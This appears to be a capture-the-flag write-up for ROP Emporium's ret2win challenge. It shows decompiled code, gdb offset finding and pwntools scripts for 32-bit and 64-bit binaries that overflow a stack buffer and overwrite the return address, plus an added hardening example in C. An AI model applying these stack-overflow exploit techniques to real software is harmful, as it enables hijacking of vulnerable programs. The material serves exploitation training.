ROP Emporium link
https://ropemporium.com/
32-bit
checksec ret2win32
Only NX is enabled.
Run ./ret2win32
Load it into 32-bit IDA and press F5 on main:
int __cdecl main(int argc, const char **argv, const char **envp)
{
    setvbuf(stdout, 0, 2, 0);
    setvbuf(stderr, 0, 2, 0);
    puts("ret2win by ROP Emporium");
    puts("32bits\n");
    pwnme();
    puts("\nExiting");
    return 0;
}
Step into pwnme():
char *pwnme()
{
    char s; // [esp+0h] [ebp-28h]

    memset(&s, 0, 0x20u);
    puts(
        "For my first trick, I will attempt to fit 50 bytes of user input into 32 bytes of stack buffer;\n"
        "What could possibly go wrong?");
    puts("You there madam, may I have your input please? And don't worry about null bytes, we're using fgets!\n");
    printf("> ");
    return fgets(&s, 50, stdin);
}
fgets lets us enter 50 bytes, while s is only 0x28 = 40 bytes; 4 more bytes cover the saved ebp, so we can write enough characters to overflow the stack.
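The root cause is that the length passed to fgets (50) has nothing to do with the real buffer size (32). As an added hardening example, not code from the page or from ROP Emporium, here is a reader that takes its capacity from the caller's buffer, rejects overlong lines instead of letting them spill, and is exercised on constructed input shaped like the 32-bit payload above (tmpfile stands in for stdin):

```c
#include <stdio.h>
#include <string.h>

/* The challenge's pwnme() does `char s[32]; fgets(&s, 50, stdin);`.
 * Here the capacity comes from the caller (sizeof the real buffer), an
 * overlong line is reported rather than silently truncated, and the rest of
 * that line is drained so the next read starts clean.
 * Returns the stored length (newline stripped), or -1 if the line did not
 * fit in cap-1 bytes (dst then holds only the truncated prefix). */
int read_line(char *dst, size_t cap, FILE *in)
{
    if (cap == 0 || fgets(dst, (int)cap, in) == NULL)
        return -1;
    size_t n = strlen(dst);
    if (n > 0 && dst[n - 1] == '\n') {
        dst[--n] = '\0';
        return (int)n;
    }
    /* No newline in the chunk: either the line was too long or it is a
     * final line without a newline. Consume up to the newline to find out. */
    int c, extra = 0;
    while ((c = fgetc(in)) != EOF && c != '\n')
        extra = 1;
    return extra ? -1 : (int)n;
}

/* Constructed input mirroring the page's 32-bit payload shape: 44 filler
 * bytes plus a 4-byte value and a newline, then a short second line.
 * Returns 1 if the overlong line is rejected and "ok" is still read intact. */
int demo_overlong_input(void)
{
    char buf[32], line[64];
    memset(line, 'A', 44);
    memcpy(line + 44, "BBBB\nok\n", 9);   /* 9 includes the terminating NUL */
    FILE *in = tmpfile();                   /* ISO C scratch stream in place of stdin */
    if (in == NULL)
        return 0;
    fwrite(line, 1, strlen(line), in);
    rewind(in);
    int first = read_line(buf, sizeof buf, in);   /* -1: 48 bytes do not fit in 31 */
    int second = read_line(buf, sizeof buf, in);  /* 2: "ok" */
    fclose(in);
    return first == -1 && second == 2 && strcmp(buf, "ok") == 0;
}

int main(void)
{
    printf("overlong input rejected: %s\n", demo_overlong_input() ? "yes" : "no");
    return 0;
}
```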
In the function list on the left, find the function ret2win().
So all we need to do is jump to ret2win() to get the flag, right?
The address of ret2win() is 0x08048659.
First, find the padding length:
gdb ret2win32
cyclic 200
(copy the 200-byte cyclic pattern)
r to run
(paste the pattern)
cyclic -l 0x6161616c (the faulting address)
Write the script:
#coding=utf8
from pwn import *
context.log_level = 'debug'
local = 1
elf = ELF('./ret2win32')
p = process('./ret2win32')
ret2win = 0x08048659          # address of ret2win() taken from IDA
payload = b''
payload += b'A' * 44          # 0x28-byte buffer + 4 bytes of saved ebp
payload += p32(ret2win)       # overwrite the return address
'''
payload = b''
payload += b'A' * 0x28
payload += p32(0)
payload += p32(ret2win)
'''
p.sendline(payload)
p.interactive()
[*] Got EOF while reading in interactive
We can't run ls, but the flag has already been printed, so it ends well.
64-bit
Same idea.
Run checksec first, then run the binary.
Load it into 64-bit IDA.
Find the backdoor function ret2win().
The address of ret2win() is 0x0400811.
Steps to find the offset in gdb:
gdb ret2win
cyclic 200
(copy the 200-byte cyclic pattern)
r to run
(paste the pattern)
cyclic -l 0x6161616b (the low 8 hex digits of the faulting address)
Write the script:
#coding=utf8
from pwn import *
context.log_level = 'debug'
local = 1
elf = ELF('./ret2win')
p = process('./ret2win')
ret2win = 0x0400811           # address of ret2win() taken from IDA
payload = b''
payload += b'A' * 40          # 0x20-byte buffer + 8 bytes of saved rbp
payload += p64(ret2win)       # overwrite the return address
'''
payload = b''
payload += b'A' * 0x20
payload += p64(0)
payload += p64(ret2win)
'''
p.sendline(payload)
p.interactive()
Both flags are ROPE{a_placeholder_32byte_flag!}